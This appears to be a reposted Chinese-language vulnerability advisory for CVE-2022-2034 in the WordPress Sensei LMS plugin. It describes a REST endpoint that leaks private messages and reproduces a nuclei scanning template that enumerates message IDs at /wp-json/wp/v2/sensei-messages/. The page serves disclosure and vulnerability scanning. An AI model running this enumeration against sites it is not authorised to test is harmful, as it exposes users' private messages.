WordPress Sensei LMS Information Disclosure Vulnerability

漏洞信息

漏洞名称: WordPress Sensei LMS Information Disclosure Vulnerability

漏洞编号:

  • CVE: CVE-2022-2034

漏洞类型: 信息泄露

漏洞等级: 中危

漏洞描述: WordPress Sensei LMS是一款流行的学习管理系统插件,广泛用于WordPress网站中,以提供在线课程和学习管理功能。该插件适用于各种规模的网站,从个人博客到企业级教育平台。此次发现的漏洞影响了4.5.0版本之前的Sensei LMS插件。漏洞的具体类型为信息泄露,其技术根源在于插件中的一个REST端点没有正确设置权限,导致攻击者可以访问私密消息。这种漏洞的存在使得未经授权的用户可以获取敏感信息,如私密消息内容,从而可能导致用户隐私泄露或其他安全问题。由于漏洞的利用不需要认证,且可以远程执行,因此其潜在的安全风险较高。网站管理员应立即升级到4.5.0或更高版本以修复此漏洞。

产品厂商: automattic

产品名称: WordPress Sensei LMS

影响版本: version < 4.5.0

来源: https://github.com/projectdiscovery/nuclei-templates/blob/b7c60754265d41e02af8d5ea7c8a40acba9a6233/http%2Fcves%2F2022%2FCVE-2022-2034.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61

id: CVE-2022-2034

info:
name: WordPress Sensei LMS <4.5.0 - Information Disclosure
author: imhunterand
severity: medium
description: |
WordPress Sensei LMS plugin before 4.5.0 is susceptible to information disclosure. The plugin does not have proper permissions set in a REST endpoint, which can allow an attacker to access private messages.
remediation: |
Upgrade WordPress Sensei LMS to version 4.5.0 or later to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/aba3dd58-7a8e-4129-add5-4dd5972c0426
- https://hackerone.com/reports/1590237
- https://wordpress.org/plugins/sensei-lms/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2034
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-2034
cwe-id: CWE-639
epss-score: 0.48133
epss-percentile: 0.97610
cpe: cpe:2.3:a:automattic:sensei_lms:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 100
vendor: automattic
product: sensei_lms
framework: wordpress
tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,fuzz,hackerone,wordpress,wp-plugin,automattic

http:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"

payloads:
num: helpers/wordlists/numbers.txt
stop-at-first-match: true

matchers-condition: and
matchers:
- type: word
part: body
words:
- 'sensei_message'
- 'guid":{"rendered":'
condition: and

- type: word
part: header
words:
- application/json

- type: status
status:
- 200
# digest: 4a0a00473045022100cebaa957b132af956ee743a6ccb602385ae92da05941df4dd57c9f45148aace802204fffed9eb8dd73ecc5b1f6853ca94db221fb66883edf87d1aad2a8b5ce6dbf67:922c64590222798bb761d5b6d8e72950


WordPress Sensei LMS Information Disclosure Vulnerability
http://example.com/2025/07/21/github_2704945801/
作者
lianccc
发布于
2025年7月21日
许可协议